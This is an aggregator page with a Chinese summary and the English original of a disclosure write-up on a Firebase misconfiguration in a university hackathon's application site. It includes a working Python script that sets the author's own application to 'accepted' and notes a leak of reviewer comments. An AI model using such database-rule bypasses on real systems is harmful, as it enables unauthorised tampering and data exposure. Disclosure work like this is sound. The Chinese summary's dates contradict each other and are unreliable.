Home 零对冲(ZeroHedge)每日HackerNews

我如何被加拿大最大的AI黑客马拉松录取
How I accepted myself into Canada's largest AI hackathon

原始链接: https://fastcall.dev/posts/genai-genesis-firebase/

在申请多伦多大学GenAI Genesis 2025黑客马拉松时,我偶然发现其Firebase设置中的一个漏洞。重置密码后,注意到firebaseapp.com域名,我便探索了网站的配置。我找到了Firebase配置对象,并且意外地通过source map访问到了未压缩的源代码。 我发现应用程序正在从Firebase检索和解析*所有*用户应用程序数据,而不管实际需要什么。这导致我发现可以发送更新请求到数据库,直接将我的申请状态修改为“已接受”,这甚至在申请截止日期之前! 在报告此问题后,我又发现了另一个漏洞:尽管他们限制了写入权限,但网站仍然获取整个应用程序对象,允许我读取敏感的、尚未公开的信息,例如我的录取状态、评审员姓名、评论和评分。后来通过修改网站仅获取必要数据,并启用更严格的数据库规则,完全修复了这个问题。这些漏洞于2025年9月3日披露,并于2025年3月12日完全修复。

Hacker News 最新 | 过去 | 评论 | 提问 | 展示 | 招聘 | 提交 登录 我是如何被加拿大最大的 AI 黑客马拉松 (fastcall.dev) 录取的 fastcall 46 分钟前 5 分 | 隐藏 | 过去 | 收藏 | 讨论 加入我们 6 月 16-17 日在旧金山的 AI 初创公司学校! 指导原则 | 常见问题 | 列表 | API | 安全 | 法律 | 申请 YC | 联系我们 搜索:
相关文章
  • 900 个站点、1.25 亿个帐户、1 个漏洞 2024-03-19
  • 如何在数亿人和流行的应用程序上获得代码执行 2025-03-02
  • 我同时拿下了美国一半的快餐连锁店 2024-01-11
  • 我是如何被 Debian 弱键漏洞绊倒的 2024-04-10
  • Gitlab 密码重置漏洞导致超过 5300 台服务器可供抢夺 2024-01-29
    • 原文

    With all the buzz online and among my friends about GenAI Genesis 2025, a generative AI hackathon hosted at my school, the University of Toronto, I decided to apply even though I was pretty busy that weekend, hoping my schedule would clear by the time the hackathon came around. The sequence of events that followed led me into finding a vulnerability that let me accept my own hackathon application, before applications had even officially closed.

    story time!

    After making my account on the site at 3 o’clock in the morning, I somehow realized that I had better things to do at the time (like sleeping), and so I decided to apply the following day. Oddly, my password manager (KeePassXC for those curious), didn’t save my password and I had to reset it:

    Hello,
Follow this link to reset your genai-hackathon-2024 password for your <email> account.
https://genai-hackathon-2024.firebaseapp.com/__/auth/action?mode=resetPassword...
If you didn’t ask to reset your password, you can ignore this email.
Thanks,
Your genai-hackathon-2024 team (2024?)

    I was sent a link to a site on the firebaseapp.com domain, and this reminded me of the countless blog posts and articles I’ve read on people finding misconfigurations in firebase, and I was curious to see if this site would fare any better.

    getting acquainted

    I started of by testing some of the low hanging fruit I’ve previously seen, but instead of using Firepwn like I saw in some blog posts, I used a python library called pyrebase (or well a fork of it that supported newer versions of python), which is just a wrapper around the firebase API.

    But before using either tool, I first needed to extract the firebase config object from the frontend, which I did by searching for some of the field names. The config object is only used for identification to firebase (even the oddly named apiKey), and none of these identifiers are supposed to be a secret.

    n.ZF)({
    apiKey: "AIzaSyAAign9HlDM7bcdWhsIzeRlvNWbLglmuUY",
    authDomain: "genai-hackathon-2024.firebaseapp.com",
    databaseURL: "https://genai-hackathon-2024-default-rtdb.firebaseio.com",
    projectId: "genai-hackathon-2024",
    storageBucket: "genai-hackathon-2024.firebasestorage.app",
    messagingSenderId: o.env.NEXT_PUBLIC_FIREBASE_MESSAGING_SENDER_ID,
    appId: "1:212015883358:web:085918af35bc10d23100cf",
    measurementId: o.env.NEXT_PUBLIC_FIREBASE_MEASUREMENT_ID
});

    While looking for the config object, I realized I had access to the original source code of the project. (before it was webpacked & minified) This is possible because sentry.io before v9 emitted source maps to production by default. devtools-src-code.png Continuing to test the low hanging fruit, I checked to see if there was misconfigured read access to the entire database.

    import empyrebase

config = {
    "apiKey": "AIzaSyAAign9HlDM7bcdWhsIzeRlvNWbLglmuUY",
    "authDomain": "genai-hackathon-2024.firebaseapp.com",
    "databaseURL": "https://genai-hackathon-2024-default-rtdb.firebaseio.com",
    "storageBucket": "genai-hackathon-2024.firebasestorage.app",
    "projectId": "genai-hackathon-2024"
}

firebase = empyrebase.initialize_app(config)

auth = firebase.auth()

user = auth.sign_in_with_email_and_password("<email>", "<password>")

db = firebase.database()

print(db.get(user['idToken']))
# "error" : "Permission denied"

    the bug

    With no luck so far, I decide to check how the site communicated with firebase, where I found a very interesting design choice. firebase-operations.png The site was grabbing all the user data it had stored about my application, and only then parsing the data received for what it actually wanted. When submitting a new application, it set the whole application object as well.

    type statusOptions =
    | 'not started'
    | 'not completed'
    | 'submitted'
    | 'waitlisted'
    | 'rejected'
    | 'accepted'
    | 'admitted'
    | 'rejected offer';

const application = {
    userId: uid,
    applicationId: uid,
    applicationStatus: status as statusOptions,
    section1: {
    // boring actual hackathon application stuff
    }
    statusFlags: {
        reviewed: false,
        shortlisted: false,
        accepted: false,
        rejected: false,
        rsvp: false,
    },
};

    After noticing this, I attempted to send a update request to the database with the applicationStatus as accepted,

    import empyrebase
import sys

firebase = empyrebase.initialize_app(config)

auth = firebase.auth()

user = auth.sign_in_with_email_and_password(sys.argv[1], sys.argv[2])

db = firebase.database()

application_info = db.child("applications").child(user["localId"]).get(user["idToken"])
application = db.child("applications").child(user["localId"])

print("before:")
for row in application_info.each():
    if row.key() == "applicationStatus":
        print(f"applicationStatus: {row.val()}")
    if row.key() == "statusFlags":
        print(f"statusFlags: {row.val()}")

dict = {
    "applicationStatus": "accepted",
    "statusFlags": {
        "accepted": True,
        "rejected": False,
        "reviewed": True,
        "shortlisted": True,
    },
}

application.update(dict, user["idToken"])

application_info = db.child("applications").child(user["localId"]).get(user["idToken"])

print("after:")
for row in application_info.each():
    if row.key() == "applicationStatus":
        print(f"applicationStatus: {row.val()}")
    if row.key() == "statusFlags":
        print(f"statusFlags: {row.val()}")

    $ python genai.py
before:
applicationStatus: submitted
statusFlags: {'accepted': False, 'rejected': False, 'reviewed': False, 'shortlisted': False}
after:
applicationStatus: accepted
statusFlags: {'accepted': True, 'rejected': False, 'reviewed': True, 'shortlisted': True}

    It worked :D

    bonus bug: information leakage

    After disclosing the initial vulnerability, I discovered that while it was no longer possible to write to any values the site itself didn’t modify, since the site still grabbed the whole application object, you could still read sensitive information about your own application, such as getting your application’s acceptance status early, your reviewer’s full name, any comments they made about you, and their overall rating of your application. (Reviewer’s names have been redacted for privacy concerns) reviewed-1.png reviewed-2.png reviewed-3.png I later verified this was fully fixed by the maintainers modifying the site to have specific functions to fetch what it needed, allowing for the further tightening of database rules.

    disclosure timeline (mm/dd/yyyy)

    • 09/03/2025 - vulnerability disclosed
    • 09/03/2025 - initial patch
    • 10/03/2025 - information leakage disclosed
    • 12/03/2025 - final patch

    conclusion

    Thanks for reading til the end! I hope you enjoyed reading this blog post as much as I enjoyed making it!

    联系我们 contact @ memedata.com